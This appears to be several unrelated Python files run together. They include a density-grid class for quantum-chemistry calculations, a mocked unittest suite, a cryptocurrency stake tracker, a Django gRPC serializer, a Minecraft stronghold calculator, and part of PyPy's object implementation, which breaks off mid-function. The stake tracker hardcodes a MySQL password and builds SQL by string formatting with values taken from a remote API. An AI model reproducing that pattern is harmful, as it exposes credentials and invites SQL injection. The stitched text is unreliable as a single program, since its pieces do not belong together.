        ''' Moves density grid in space.

        Parameters
        ----------
        dx,dy,dz : real
            Distance of density shift along x resp. y resp. z axis.
        '''
        vec=np.array([dx,dy,dz],dtype='f8')
        # Shift both the grid origin and the atomic coordinates.
        self.origin=self.origin+vec
        self.coor.move(dx,dy,dz)

    def rotate(self,rotxy,rotxz,rotyz):
        ''' Rotate DENSITY in SPACE by a positive rotational angle (right-hand
        rule). First rotation is around the z axis, then around y, then x.

        Parameters
        ----------
        rotxy,rotxz,rotyz : real
            `rotxy` resp. `rotxz` resp. `rotyz` is angle in RADIANS of rotation
            around z resp. y resp. x axis in positive direction
        '''
        # Rotation handled in atomic units
        # NOTE(review): RotateAndMove is fed a (1,3) array for the origin —
        # confirm _origin keeps the expected shape afterwards.
        self._origin=RotateAndMove(np.array([self._origin]),0.0,0.0,0.0,rotxy,rotxz,rotyz)
        self.coor.rotate(rotxy,rotxz,rotyz)
        self._step=RotateAndMove(self._step,0.0,0.0,0.0,rotxy,rotxz,rotyz)

    def rotate_1(self,rotxy,rotxz,rotyz):
        ''' Rotate DENSITY in SPACE by a negative rotational angle (inverse of
        rotate). First rotation is around the x axis, then around y, then z.

        Parameters
        ----------
        rotxy,rotxz,rotyz : real
            `rotxy` resp. `rotxz` resp. `rotyz` is angle in RADIANS of rotation
            around z resp. y resp. x axis in positive direction
        '''
        self._origin=RotateAndMove_1(np.array([self._origin]),0.0,0.0,0.0,rotxy,rotxz,rotyz)
        self.coor.rotate_1(rotxy,rotxz,rotyz)
        self._step=RotateAndMove_1(self._step,0.0,0.0,0.0,rotxy,rotxz,rotyz)

    def center(self,indx_center,indx_x,indx_y):
        ''' Center density according to a defined center and main axes.
        The center atom ends up at the origin of the coordinate system and
        vector X points along the x axis while vector Y lies in the xy plane.
        Vectors X and Y are defined by atomic indexes.

        Parameters
        ----------
        indx_center : int or list of int
            When `indx_center`=i it refers to atomic coordinate of ith atom
            (counted from zero) => center=coor[i,:].
            When `indx_center`=[i,j,k,..] then center is the average coordinate
            of all listed atoms => center=(coor[i,:]+coor[j,:]+coor[k,:]...)/N
        indx_x : int or list of int of length 2 or 4
            When `indx_x`=i then vector X is defined as Coor[i,:]-center.
            When `indx_x`=[i,j] then vector X is defined as Coor[j,:]-Coor[i,:].
            When `indx_x`=[i,j,k,l] then vector X is defined as
            (Coor[j,:]-Coor[i,:])+(Coor[l,:]-Coor[k,:]).
        indx_y : int or list of int of length 2 or 4
            When `indx_y`=i then vector Y is defined as Coor[i,:]-center.
            When `indx_y`=[i,j] then vector Y is defined as Coor[j,:]-Coor[i,:].
            When `indx_y`=[i,j,k,l] then vector Y is defined as
            (Coor[j,:]-Coor[i,:])+(Coor[l,:]-Coor[k,:]).
        '''
        # The grid origin is appended to the atomic coordinates so that the
        # same rigid-body transformation is applied to it.
        Coor_ext=[]
        for ii in range(len(self.coor._value)):
            Coor_ext.append(self.coor._value[ii])
        Coor_ext.append(self._origin)
        Coor_ext=np.array(Coor_ext)
        Coor_centered,Phi,Psi,Chi,center=CenterMolecule(Coor_ext,indx_center,indx_x,indx_y,print_angles=True)
        # Rebuild the Coordinate object (all but the last row, which is the
        # transformed grid origin).
        with position_units("Bohr"):
            self.coor=Coordinate(Coor_centered[0,:])
            for ii in range(1,len(Coor_centered)-1):
                self.coor.add_coor(Coor_centered[ii,:])
        self._origin=Coor_centered[len(self.coor._value),:]
        # Apply the same rotation (no translation) to the step vectors.
        self._step=RotateAndMove(self._step,0.0,0.0,0.0,Phi,Psi,Chi)

    def dipole(self,output_center=False):
        ''' Calculate numerically the dipole from the density.
        For a ground state electron density it yields the ground state dipole
        and for a transition density the transition dipole.

        Returns
        ----------
        dipole : numpy.array of real (dimension 3)
            dipole in ATOMIC UNITS (e*bohr)

        Notes
        ----------
        It calculates Int{-r.rho(r)dxdydz} which is the dipole.
        '''
        # TODO: repair matrix approach to be used also for rotated density
        if 0:
            # This works only for nonrotated grid - change but keep the idea
            grid=Grid()
            grid.init_from_cub(self)
            dipole=np.zeros(3,dtype='f8')
            dipole[0]=np.sum(np.multiply(grid.X,self.data))
            dipole[1]=np.sum(np.multiply(grid.Y,self.data))
            dipole[2]=np.sum(np.multiply(grid.Z,self.data))
            dipole = -np.multiply(grid.ddV,dipole)
            dV=np.dot(self.step[0,:],np.cross(self.step[1,:],self.step[2,:]))
            dipole=np.multiply(-dV,dipole)
            return dipole
        else:
            # more efficient would be to create 3D grids with coordinates then
            # multiply and then sum all
            dipole = np.zeros(3,dtype='f8')
            center = np.zeros(3,dtype='f8')
            for ii in range(self.grid[0]):
                for jj in range(self.grid[1]):
                    for kk in range(self.grid[2]):
                        rr=self._origin+ii*self._step[0,:]+jj*self._step[1,:]+kk*self._step[2,:]
                        dipole+=self.data[ii,jj,kk]*rr
                        # |rho|-weighted centroid of the density.
                        center+=np.abs(self.data[ii,jj,kk])*rr
            # Volume element of the (possibly non-orthogonal) grid cell.
            dV=np.dot(self._step[0,:],np.cross(self._step[1,:],self._step[2,:]))
            dipole=dipole*dV
            center = center/np.sum(np.abs(self.data))
            print('Dipole calculated by function dipole was chaged from -dipole to dipole. Make sure that you are using right value')
            if output_center:
                return -dipole,center
            else:
                return -dipole

    def dipole_partial(self,x_min=None,x_max=None,y_min=None,y_max=None,z_min=None,z_max=None):
        ''' Calculate numerically the dipole from a part of the density.
        For a ground state electron density it yields the partial ground state
        dipole and from a transition density the partial transition dipole.

        Parameters
        ----------
        x_min,x_max : real (optional - init=None)
            Minimal and maximal x coordinate between which the density is used
            for calculation of the dipole. Unspecified bounds default to the
            full extent of the density.
        y_min,y_max : real (optional - init=None)
            Same for the y coordinate.
        z_min,z_max : real (optional - init=None)
            Same for the z coordinate.

        Returns
        ----------
        dipole : numpy.array of real (dimension 3)
            dipole in ATOMIC UNITS (e*bohr)

        Notes
        ----------
        Resulting dipole is the numerically calculated integral
        Int_{x_min,y_min,z_min}^{x_max,y_max,z_max} (-r.rho(r))dxdydz
        '''
        # Unspecified bounds become +-1e5 (effectively infinite in Bohr);
        # user-supplied bounds are converted into internal units.
        if x_min==None:
            x_min=-1.0e5
        else:
            x_min=PositionUnitsManaged.manager.convert_position_2_internal_u(x_min)
        if x_max==None:
            x_max=1.0e5
        else:
            x_max=PositionUnitsManaged.manager.convert_position_2_internal_u(x_max)
        if y_min==None:
            y_min=-1.0e5
        else:
            y_min=PositionUnitsManaged.manager.convert_position_2_internal_u(y_min)
        if y_max==None:
            y_max=1.0e5
        else:
            y_max=PositionUnitsManaged.manager.convert_position_2_internal_u(y_max)
        if z_min==None:
            z_min=-1.0e5
        else:
            z_min=PositionUnitsManaged.manager.convert_position_2_internal_u(z_min)
        if z_max==None:
            z_max=1.0e5
        else:
            z_max=PositionUnitsManaged.manager.convert_position_2_internal_u(z_max)
        # TODO: Convert boundaries from current values to internal
        #print(x_min,x_max,y_min,y_max,z_min,z_max)
        dipole=np.zeros(3,dtype='f8')
        for ii in range(self.grid[0]):
            for jj in range(self.grid[1]):
                for kk in range(self.grid[2]):
                    rr=self._origin+ii*self._step[0,:]+jj*self._step[1,:]+kk*self._step[2,:]
                    # Only grid points inside the requested box contribute.
                    if rr[0]>=x_min and rr[0]<=x_max and rr[1]>=y_min and rr[1]<=y_max and rr[2]>=z_min and rr[2]<=z_max:
                        dipole+=self.data[ii,jj,kk]*rr
        dV=np.dot(self._step[0,:],np.cross(self._step[1,:],self._step[2,:]))
        dipole=dipole*dV
        print('Dipole calculated by function dipole_partial was chaged from -dipole to dipole. Make sure that you are using right value')
        return -dipole

    def cut(self,x_min=None,x_max=None,y_min=None,y_max=None,z_min=None,z_max=None):
        ''' Takes a cut of the density.
        **Works only for original (nonrotated) transition density with
        step[0,:] pointing along x axis, step[1,:] pointing along y axis and
        step[2,:] pointing along z axis.**

        Parameters
        ----------
        x_min,x_max : real (optional - init=None)
            Minimal and maximal x coordinate in ATOMIC UNITS (Bohr) between
            which the density is outputed. Unspecified bounds default to the
            full extent of the density.
        y_min,y_max : real (optional - init=None)
            Same for the y coordinate.
        z_min,z_max : real (optional - init=None)
            Same for the z coordinate.

        Returns
        ----------
        cuted_density : DensityGrid class
            DensityGrid class with density which is a subsystem of the
            original density defined on grid points with coordinates:
            x_min <= x <= x_max, y_min <= y <= y_max and z_min <= z <= z_max.
        '''
        # Resolve the default bounds; the step sign decides which end of the
        # axis is the minimum. User-supplied bounds are converted to internal
        # units.
        if x_min==None:
            if self._step[0,0]>0:
                x_min=self._origin[0]
            else:
                x_min=self._origin[0]+self._step[0,0]*(self.grid[0]-1)
        else:
            x_min=PositionUnitsManaged.manager.convert_position_2_internal_u(x_min)
        if x_max==None:
            if self._step[0,0]>0:
                x_max=self._origin[0]+self._step[0,0]*(self.grid[0]-1)
            else:
                x_max=self._origin[0]
        else:
            x_max=PositionUnitsManaged.manager.convert_position_2_internal_u(x_max)
        if y_min==None:
            if self._step[1,1]>0:
                y_min=self._origin[1]
            else:
                y_min=self._origin[1]+self._step[1,1]*(self.grid[1]-1)
        else:
            y_min=PositionUnitsManaged.manager.convert_position_2_internal_u(y_min)
        if y_max==None:
            if self._step[1,1]>0:
                y_max=self._origin[1]+self._step[1,1]*(self.grid[1]-1)
            else:
                y_max=self._origin[1]
        else:
            y_max=PositionUnitsManaged.manager.convert_position_2_internal_u(y_max)
        if z_min==None:
            if self._step[2,2]>0:
                z_min=self._origin[2]
            else:
                z_min=self._origin[2]+self._step[2,2]*(self.grid[2]-1)
        else:
            z_min=PositionUnitsManaged.manager.convert_position_2_internal_u(z_min)
        if z_max==None:
            if self._step[2,2]>0:
                z_max=self._origin[2]+self._step[2,2]*(self.grid[2]-1)
            else:
                z_max=self._origin[2]
        else:
            z_max=PositionUnitsManaged.manager.convert_position_2_internal_u(z_max)
        #print(x_min,x_max,y_min,y_max,z_min,z_max)
        # For each axis determine the [first, last) index range of grid points
        # lying inside the requested box.
        x=[0,0]
        if self._step[0,0]>0:
            for ii in range(self.grid[0]):
                if self._origin[0]+self._step[0,0]*ii<x_min:
                    x[0]=ii+1
                elif self._origin[0]+self._step[0,0]*ii>x_max and x[1]==0:
                    x[1]=ii-1
            if x[1]==0:
                x[1]=self.grid[0]
        else:
            for ii in range(self.grid[0]):
                if self._origin[0]+self._step[0,0]*ii>x_max:
                    x[0]=ii+1
                elif self._origin[0]+self._step[0,0]*ii<x_min and x[1]==0:
                    x[1]=ii-1
            if x[1]==0:
                x[1]=self.grid[0]
        y=[0,0]
        if self._step[1,1]>0:
            for ii in range(self.grid[1]):
                if self._origin[1]+self._step[1,1]*ii<y_min:
                    y[0]=ii+1
                elif self._origin[1]+self._step[1,1]*ii>y_max and y[1]==0:
                    y[1]=ii-1
            if y[1]==0:
                y[1]=self.grid[1]
        else:
            for ii in range(self.grid[1]):
                if self._origin[1]+self._step[1,1]*ii>y_max:
                    y[0]=ii+1
                elif self._origin[1]+self._step[1,1]*ii<y_min and y[1]==0:
                    y[1]=ii-1
            if y[1]==0:
                # NOTE(review): this uses self.grid[0] while every other
                # fallback on this axis uses self.grid[1] — looks like a
                # copy-paste bug; confirm before relying on negative y steps.
                y[1]=self.grid[0]
        z=[0,0]
        if self._step[2,2]>0:
            for ii in range(self.grid[2]):
                if self._origin[2]+self._step[2,2]*ii<z_min:
                    z[0]=ii+1
                elif self._origin[2]+self._step[2,2]*ii>z_max and z[1]==0:
                    z[1]=ii-1
            if z[1]==0:
                z[1]=self.grid[2]
        else:
            print('z is negative')
            for ii in range(self.grid[2]):
                if self._origin[2]+self._step[2,2]*ii>z_max:
                    z[0]=ii+1
                elif self._origin[2]+self._step[2,2]*ii<z_min and z[1]==0:
                    z[1]=ii-1
            if z[1]==0:
                z[1]=self.grid[2]
        #print(x,y,z)
        # Build the sub-density: shift origin to the first kept point and
        # slice the data block accordingly.
        origin_new=self._origin[:]+self._step[0,:]*x[0]+self._step[1,:]*y[0]+self._step[2,:]*z[0]
        grid_new=np.array([x[1]-x[0],y[1]-y[0],z[1]-z[0]])
        data_new=self.data[x[0]:x[1],y[0]:y[1],z[0]:z[1]]
        step_new=np.copy(self._step)
        with position_units("Bohr"):
            cuted_density=DensityGrid(origin_new,grid_new,step_new,data_new,typ=np.copy(self.type),mo_indx=np.copy(self.indx),Coor=np.copy(self.coor.value),At_charge=np.copy(self.at_charge))
        return cuted_density

    def calc_atomic_properties(self):
        ''' Calculate atomic charges and atomic dipoles by numerically
        integrating the density. Each grid point is assigned to its nearest
        atom; atomic charges are sums of density over the assigned points and
        atomic dipoles are sums of (point - atom) vectors weighted by density.

        Returns
        ----------
        charges : numpy.array of real (dimension Natoms)
            Atomic charges for every atom of the system
        dipoles : numpy.array of real (dimension Natoms x 3)
            Atomic dipole in ATOMIC UNITS (e*bohr) for every atom
        '''
        Nat=len(self.coor._value)
        charges=np.zeros(Nat,dtype='f8')
        dipoles=np.zeros((Nat,3),dtype='f8')
        for ii in range(self.grid[0]):
            for jj in range(self.grid[1]):
                for kk in range(self.grid[2]):
                    rr=self._origin+ii*self._step[0,:]+jj*self._step[1,:]+kk*self._step[2,:]
                    # Nearest-atom search; 30 Bohr is the starting "infinite"
                    # distance (points farther than that default to atom 0).
                    dist_min=30.0
                    index=0
                    for ll in range(len(self.coor._value)):
                        dist=np.sqrt(np.dot(rr-self.coor._value[ll],rr-self.coor._value[ll]))
                        if dist<dist_min:
                            index=ll
                            dist_min=np.copy(dist)
                    charges[index]+=self.data[ii,jj,kk]
                    dipoles[index,:]+=(rr-self.coor._value[index])*self.data[ii,jj,kk]
        dV=np.dot(self._step[0,:],np.cross(self._step[1,:],self._step[2,:]))
        print('Atomic dipole calculated by function calc_atomic_properties was chaged from -dipole to dipole. Make sure that you are using right value')
        return charges*dV,-dipoles*dV

    def _elpot_at_position(self,position):
        ''' Calculate electrostatic potential of the electronic density,
        approximating it as cubic boxes with homogeneous charge distribution.
        **THIS IS A VERY CRUDE APPROXIMATION AND COMPARISON WITH THE POTENTIAL
        CALCULATED FROM ATOMIC ORBITALS SHOWED THAT IT DOESN'T PROVIDE (NOT
        EVEN CLOSE TO) THE REAL POTENTIAL**

        Parameters
        ----------
        position : numpy.array of real (dimension 3)
            Coordinates in ATOMIC UNITS (Bohr) of the point where the
            electrostatic potential should be calculated

        Returns
        ----------
        result : real
            Potential at `position` in ATOMIC UNITS
        '''
        result=0.0
        # Integrand of the analytic potential of a homogeneously charged box,
        # expressed via error functions; integrated over the auxiliary
        # variable t below.
        def aux_function(rr,stepx,stepy,stepz,t):
            res=scipy.special.erf(t*(stepx/2-rr[0]))+scipy.special.erf(t*(stepx/2+rr[0]))
            res=res * (scipy.special.erf(t*(stepy/2-rr[1]))+scipy.special.erf(t*(stepy/2+rr[1])))
            res=res * (scipy.special.erf(t*(stepz/2-rr[2]))+scipy.special.erf(t*(stepz/2+rr[2])))
            res=res/t**3
            return res
        rr1=np.copy(position)
        for m in range(self.grid[0]):
            for n in range(self.grid[1]):
                for o in range(self.grid[2]):
                    rr2=self._origin + m*self._step[0,:]+n*self._step[1,:]+o*self._step[2,:]
                    dr=rr1-rr2
                    # Upper integration limit chosen from the distance to the
                    # box faces.
                    tmax=max([5/np.abs(np.abs(dr[0])-np.abs(self._step[0,0]/2)),5/np.abs(np.abs(dr[1])-np.abs(self._step[1,1]/2)),5/np.abs(np.abs(dr[2])-np.abs(self._step[2,2]/2))])
                    #if tmax<5e-1:
                    #    ESP_Grid[i,j,k]-=self.data[m,n,o]/np.sqrt(np.dot(dr,dr))*dV
                    #else:
                    tmax=max([200,tmax])
                    aux_function_partial = partial(aux_function,dr,self._step[0,0],self._step[1,1],self._step[2,2])
                    # NOTE(review): the prefactor here is np.pi/4 while
                    # _dens_to_ESP2 uses np.sqrt(np.pi)/4 for the same
                    # integral — one of them is presumably wrong; confirm.
                    result-=self.data[m,n,o]*np.pi/4*scipy.integrate.quadrature(aux_function_partial,0,tmax,tol=1e-05,maxiter=100)[0]
        return result

    def _dens_to_ESP2(self):
        ''' Create an electrostatic-potential grid from the electronic
        density, approximating it as cubic boxes with homogeneous charge
        distribution.
        **THIS IS A VERY CRUDE APPROXIMATION AND COMPARISON WITH THE POTENTIAL
        CALCULATED FROM ATOMIC ORBITALS SHOWED THAT IT DOESN'T PROVIDE (NOT
        EVEN CLOSE TO) THE REAL POTENTIAL**
        '''
        ESP=DensityGrid(self.origin,self.grid,self.step,None,Coor=self.coor.value,At_charge=self.at_charge)
        ''' Calculate volume element '''
        vecX=np.copy(self._step[0,:])
        vecY=np.copy(self._step[1,:])
        vecZ=np.cross(vecX,vecY)
        dV=np.dot(vecZ,self._step[2,:])
        # Evaluate the potential at cell centers, hence the half-step shift.
        ESP._origin=ESP._origin+self._step[0,:]/2.0+self._step[1,:]/2.0+self._step[2,:]/2.0
        ESP_Grid=np.zeros((self.grid[0],self.grid[1],self.grid[2]),dtype='f8')
        # Same homogeneous-box integrand as in _elpot_at_position.
        def aux_function(rr,stepx,stepy,stepz,t):
            res=scipy.special.erf(t*(stepx/2-rr[0]))+scipy.special.erf(t*(stepx/2+rr[0]))
            res=res * (scipy.special.erf(t*(stepy/2-rr[1]))+scipy.special.erf(t*(stepy/2+rr[1])))
            res=res * (scipy.special.erf(t*(stepz/2-rr[2]))+scipy.special.erf(t*(stepz/2+rr[2])))
            res=res/t**3
            return res
        for i in range(ESP.grid[0]):
            print(i,'/',ESP.grid[0])
            for j in range(ESP.grid[1]):
                for k in range(ESP.grid[2]):
                    rr1=ESP._origin + i*ESP._step[0,:]+j*ESP._step[1,:]+k*ESP._step[2,:]
                    for m in range(self.grid[0]):
                        for n in range(self.grid[1]):
                            for o in range(self.grid[2]):
                                rr2=self._origin + m*self._step[0,:]+n*self._step[1,:]+o*self._step[2,:]
                                dr=rr1-rr2
                                tmax=max([5/np.abs(np.abs(dr[0])-np.abs(self._step[0,0]/2)),5/np.abs(np.abs(dr[1])-np.abs(self._step[1,1]/2)),5/np.abs(np.abs(dr[2])-np.abs(self._step[2,2]/2))])
                                if tmax<5e-1:
                                    # Far away: treat the box as a point charge.
                                    ESP_Grid[i,j,k]-=self.data[m,n,o]/np.sqrt(np.dot(dr,dr))*dV
                                else:
                                    tmax=max([200,tmax])
                                    aux_function_partial = partial(aux_function,dr,self._step[0,0],self._step[1,1],self._step[2,2])
                                    ESP_Grid[i,j,k]-=self.data[m,n,o]*np.sqrt(np.pi)/4*scipy.integrate.quadrature(aux_function_partial,0,tmax,tol=1e-05,maxiter=100)[0]
                    # NOTE(review): self-interaction correction using the tmax
                    # left over from the last inner iteration — confirm the
                    # intended placement/value.
                    ESP_Grid[i,j,k]-=np.pi/tmax**2*self.data[i,j,k]
        #ESP_Grid=ESP_Grid
        #for m in range(ESP.grid[0]):
        #    for n in range(ESP.grid[1]):
        #        for o in range(ESP.grid[2]):
        #            for ii in range(len(self.coor)):
        #                dr=ESP.origin + m*ESP.step[0,:]+n*ESP.step[1,:]+o*ESP.step[2,:]-self.coor[ii]
        #                norm2=np.sqrt(np.dot(dr,dr))
        #                ESP_Grid[m,n,o]+=self.at_charge[ii]/norm2
        ESP.data=np.copy(ESP_Grid)
        return ESP
nilq/baby-python
python
from unittest import TestCase
from unittest.mock import patch

import getting_logs


class TestGetLog(TestCase):
    """Tests for fetching logs from a third-party resource and for the
    shape of the data handed over for persisting to the database."""

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        # Canned successful payload returned by the mocked log source.
        cls.data = {
            'error': '',
            'logs': [{
                'сreated_at': '2021-01-23T12:33:14',
                'first_name': 'А',
                'message': 'Write the code!',
                'second_name': 'B',
                'user_id': '123456'
            }]
        }
        # Canned error payload returned by the mocked log source.
        cls.error = {
            'error': 'created_day: does not match format 20200105'
        }

    def _check_payload(self, received, expected):
        """Shared assertions: payload exists, is a dict, and matches."""
        self.assertIsNotNone(received, 'Ошибка. Пустой объект.')
        self.assertIsInstance(received, dict, 'Ошибка. Получен не json.')
        self.assertEqual(
            received, expected, 'Ошибка. Получены неверные данные.')

    @patch('getting_logs.GetLog')
    def test_logs_get(self, mock_get_log):
        """A successful fetch yields the expected log payload."""
        client = mock_get_log()
        client.get.return_value = self.data
        self._check_payload(client.get(), client.get.return_value)

    @patch('getting_logs.GetLog')
    def test_error_get(self, mock_get_log):
        """An error response is still returned as a dict payload."""
        client = mock_get_log()
        client.get.return_value = self.error
        self._check_payload(client.get(), client.get.return_value)

    @patch('getting_logs.GetLog')
    def test_saving_logs(self, mock_get_log):
        """The fetched payload is passed unchanged to the saving step."""
        client = mock_get_log()
        client.get.return_value = self.data
        fetched = client.get()
        client.saving_logs(fetched)

        self.assertEqual(mock_get_log, getting_logs.GetLog)
        self.assertIsNotNone(mock_get_log.called)
        client.get.assert_called_with()
        client.saving_logs.assert_called_once_with(client.get.return_value)
nilq/baby-python
python
# coding: utf8 import requests import json import os import time import pymysql.cursors connection = pymysql.connect(host='127.0.0.1', port=3306, user='ub', password='UB@018_world_cup', db='db_world_cup', charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor) g_stake_address = [ '18QQJNannotKo2Q9CkiqBJcf4qZWANZvGM', '16JUBxCKb5LsQP7pZANc2yWpqvv4Xxqpw5', '17ThubQK723mnUAhJyQ5g3y7WGExMu5X1d', # '1BdR8SFVB67JbLdbtJBagN4oFGvUGYqUjh', '1EvSWArvHhg2LxDBBSqDmyabqKpJXh2dVW', '1Kn4scG7XnyHkWS8JXBEnHv1rHZuatKK1r', '141fdMZPSXyx1Ym73Tf7f5PgLrw4sTaRcG', '13QXEiy8nfSiZa5co2bMCcKXbbDTCUaqPd', '1EiiEpwmueb5gnPaf83QMfpZZa6NHa5xyu', '1Q82uttbmSsiTSb3xkk16u5bY3Vd8NJi1k', '1NCbHsPT7ET1W5M1eUxfdRnecUHKWifLey', '12fZL8ujSoDyf1JGG5bwTZveMfpBnKNbjK', '1DvETyyKTNbTVi8YFeqJcQGMz6PAbsgSc2', '1N91rYn2vcuZH9twrx9sZEbMD1Va4oxb8M', '16K7C5qHL7mRY31Wu4dGXx6DgHrHvrPMEm', '16VCNicr93VhLQuFgJaXu8JmbJubA68fnS', '17gEQUDzoBucaDb5yNVf7h9RwzR8h8ndWc', '19JrzBCwat2yEy2Y7LZpkKozgffCNoc5mz', '1Axnf6NNABo8VnDyFYk7FEajuNtSFjRYZw', '13BauCmfa5JNoHxtQaeWoWT1Xqwree6HZx', '1BYunn44TecdU1tRWtSnxpPhYbAA99rGm1', '18L1zzKrNwL2Huov1iUdCuUr1HE1e7tFLk', '18hsZYuXmD2oBHdxnWLTqVAaX9Ge7t8KxB', '1FNNeq9Wpq1TQ2C1iLYQL3zn3BHAkh12dp', '15hoi9mLw53ATgMdtwdMgtJUUin6cTwxYc', '19Eb7zndhKVVozm4AD9e3KtxbESBvZZqLa', '1KdK3LMNjrPaRhn7i3evGX5uxBhhP2nTsw', '1HpTt76LdQG21QFttRtNGPqTcF6Tjbh2hY', '1NK6KkGo1uYCq1Xv4GZ9gL3217UbqbFygP', '15amvgyWfrCyFtr1r1NXX3GLoAzUX6pE2w', '1BaTnykKitJ5mG8RJXfR1YNbcnDF8ZDHcF', '12LGWm2ovNiKVafAm9GbEmDbQdz7ezGeto', '1FbQBr2fg9aQyJp1HhsENFGo6tdcNjpguc' ] class StateManager(object): def __init__(self): self.id_file = 'id_file' try: f = os.open(self.id_file, os.O_RDONLY) self.latest_id = os.read(f, 10) os.close(f) if self.latest_id is None: self.latest_id = '1' else: self.latest_id = self.latest_id.decode('ascii') except: self.latest_id = '1' def get_last_id(self): return self.latest_id def increase_last_id(self, id): if id > self.latest_id: self.latest_id = id def save_latest_id(self): try: 
os.remove(self.id_file) except: pass f = os.open(self.id_file, os.O_WRONLY | os.O_TRUNC | os.O_CREAT) os.write(f, self.latest_id.encode('ascii')) os.close(f) print(self.latest_id) def __del__(self): self.save_latest_id() def update_database(address, count, time, item, isAnybit): cursor = connection.cursor() sql = "INSERT INTO `t_stake` (`address`, `count`, `time`, `type`, `item`, `txid`, `isAnybit`) VALUES ('%s', %d, '%s', 2, %d, '', %d) ON DUPLICATE KEY UPDATE count=VALUES(count)" % \ (address, count, time, item, isAnybit) cursor.execute(sql) connection.commit() def get_latest_transaction(last_id, address, item): query_trans_request = '''{ "header": { "version": "1.0.1", "language": "zh", "trancode": "tran_page", "clienttype": "Android", "walletid": "927fc097c3567fe119cde85529fb7630fc1b690a", "random": "123456", "handshake": "abcdefg", "imie": "abcdefg" }, "body": { "coinAddr":"%s", "coinType":"UBTC", "queryType":"1", "lastId":%d, "limit":10 } } ''' % (address, int(last_id)) query_headers = {'Content-Type': "application/json"} # print(query_trans_request) response = requests.post('https://www.anybit.io/server/process/', data=query_trans_request, headers=query_headers) # response = requests.post('http://192.168.1.220:8080/lightwallet/server/process', data=query_trans_request, headers=query_headers) # print(response.text) records = json.loads(response.text)['data']['trans'] latest_id = int(last_id) for r in records: print(r['targetAddr'] + ': ' + str(r['tranAmt'])) if latest_id < r['id']: latest_id = r['id'] if 'source' in r and r['source'] == 1: count = int(float(r['tranAmt']) * 10 * 5 / 4) isAnybit = 1 else: count = int(float(r['tranAmt']) * 10) isAnybit = 0 if count <= 0: continue ctime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(r['createTime'] / 1000)) # item = g_stake_address.index(r['targetAddr']) print(r['targetAddr'], count, ctime, item) update_database(r['targetAddr'], count, ctime, item, isAnybit) return latest_id if __name__ == '__main__': sm = 
StateManager()
    # Poll loop: sweep every stake address, ingest new transactions,
    # persist the high-water-mark id, then sleep before the next sweep.
    while True:
        item = 1
        for a in g_stake_address:
            last_id = get_latest_transaction(sm.get_last_id(), a, item)
            item += 1
            # Advance the stored id so the next address query (and the
            # next sweep) only asks for newer transactions.
            sm.increase_last_id(str(last_id))
        sm.save_latest_id()
        time.sleep(30)
        # print('end: ', sm.get_last_id())
nilq/baby-python
python
from .bar import f
nilq/baby-python
python
from django.contrib.auth.models import User
from django_grpc_framework import proto_serializers
import account_pb2


class UserProtoSerializer(proto_serializers.ModelProtoSerializer):
    """Maps Django auth ``User`` instances to/from the generated
    ``account_pb2.User`` protobuf message."""

    class Meta:
        # Django model and protobuf message this serializer bridges.
        model = User
        proto_class = account_pb2.User
        # Only these model fields are exposed on the message.
        fields = ['id', 'username', 'email', 'groups']
nilq/baby-python
python
"""Stronghold triangulation helpers.

Stores the player's first eye-of-ender throw in module globals so a
second throw can later be combined with it to locate the stronghold.
"""
from minecraftmath import calculator
from system import window_management as wm

# State of the first recorded throw (position and facing angle).
xFirThr = 0
zFirThr = 0
angleFirThr = 0

def findSecondSuggestedThrow(startPosX, startPosZ, startAngle):
    """Record the first throw and suggest where to make the second one.

    Returns (x, z, angle) for the suggested second throw, or — when the
    first throw already lies inside the stronghold ring — a 4-tuple
    (0, 0, angle, distance).  NOTE(review): the two branches return
    tuples of different lengths; confirm callers handle both shapes.
    """
    global xFirThr, zFirThr, angleFirThr
    xFirThr = startPosX
    zFirThr = startPosZ
    angleFirThr = startAngle
    inRing, distance = calculator.distanceFromOrigin(xFirThr, zFirThr)
    if inRing:
        return (0,0,calculator.convertToMinecraftAngle(angleFirThr, inRing=True), distance)
    else:
        # Project the first throw onto the ring and pick a second
        # vantage point from which to triangulate.
        xSugThr, zSugThr = calculator.calculateSecondThrowCoordinates(*calculator.calculateHitRing(xFirThr, zFirThr, angleFirThr))
        angleSugThr = calculator.calculateAngleAToB(xFirThr, zFirThr, xSugThr, zSugThr)
        return (xSugThr, zSugThr, angleSugThr)

def findStronghold(startPosX, startPosZ, startAngle):
    """Combine the stored first throw with this (second) throw and
    return (x, z, angle) of the triangulated stronghold position."""
    global xFirThr, zFirThr, angleFirThr
    xStronghold, zStronghold = calculator.calculateStrongholdCoordinates(xFirThr, zFirThr, angleFirThr, startPosX, startPosZ, startAngle)
    angleStronghold = calculator.calculateAngleAToB(startPosX, startPosZ, xStronghold, zStronghold)
    return (xStronghold, zStronghold, angleStronghold)
nilq/baby-python
python
"""The builtin object type implementation""" from pypy.interpreter.baseobjspace import W_Root from pypy.interpreter.error import OperationError, oefmt from pypy.interpreter.gateway import applevel, interp2app, unwrap_spec from pypy.interpreter.typedef import ( GetSetProperty, TypeDef, default_identity_hash) from pypy.objspace.descroperation import Object app = applevel(r''' def _abstract_method_error(typ): methods = ", ".join(sorted(typ.__abstractmethods__)) err = "Can't instantiate abstract class %s with abstract methods %s" raise TypeError(err % (typ.__name__, methods)) def reduce_1(obj, proto): import copyreg return copyreg._reduce_ex(obj, proto) def _getstate(obj): cls = obj.__class__ try: getstate = obj.__getstate__ except AttributeError: # and raises a TypeError if the condition holds true, this is done # just before reduce_2 is called in pypy state = getattr(obj, "__dict__", None) # CPython returns None if the dict is empty if state is not None and len(state) == 0: state = None names = slotnames(cls) # not checking for list if names is not None: slots = {} for name in names: try: value = getattr(obj, name) except AttributeError: pass else: slots[name] = value if slots: state = state, slots else: state = getstate() return state def reduce_2(obj, proto, args, kwargs): cls = obj.__class__ if not hasattr(type(obj), "__new__"): raise TypeError("can't pickle %s objects" % type(obj).__name__) import copyreg if not isinstance(args, tuple): raise TypeError("__getnewargs__ should return a tuple") if not kwargs: newobj = copyreg.__newobj__ args2 = (cls,) + args elif proto >= 4: newobj = copyreg.__newobj_ex__ args2 = (cls, args, kwargs) else: raise ValueError("must use protocol 4 or greater to copy this " "object; since __getnewargs_ex__ returned " "keyword arguments.") state = _getstate(obj) listitems = iter(obj) if isinstance(obj, list) else None dictitems = iter(obj.items()) if isinstance(obj, dict) else None return newobj, args2, state, listitems, dictitems def 
